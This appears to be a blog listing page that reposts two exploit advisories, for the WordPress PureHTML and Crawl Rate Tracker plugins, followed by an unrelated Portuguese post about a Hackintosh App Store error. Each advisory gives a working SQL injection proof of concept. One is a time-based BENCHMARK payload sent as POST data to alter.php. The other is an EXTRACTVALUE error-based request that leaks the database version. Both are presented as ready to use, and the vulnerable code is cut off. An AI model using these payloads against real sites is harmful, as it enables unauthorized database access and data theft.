WordPress PureHTML plugin

06/09/2011 0 Comments

# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— if(!isset($_POST[‘PureHTMLNOnce’])){ if ( !wp_verify_nonce( $_POST[‘PureHTMLNOnce’], …

WordPress Crawl Rate Tracker plugin

06/09/2011 0 Comments

# Exploit Title: WordPress Crawl Rate Tracker plugin < = 2.0.2 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip # Version: 2.0.2 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20 --------------- Vulnerable code --------------- class b3_chartData extends b3_sbTrackingConfig { …

Como resolver problema | erro da AppStore no Hackintosh | Mac OS X Lion

02/08/2011 86 Comments

Olá galera tudo na paz? Hoje galera vou dar possíveis soluções para um problema que pelo que vi após o aparecimento de um certo Leão que nossa querida Apple soltou por ai vem acontecendo com frequência…. “Your device or computer could not be verified.Contact support for assistance help” Com Mac OS X Lion, simplismente todos …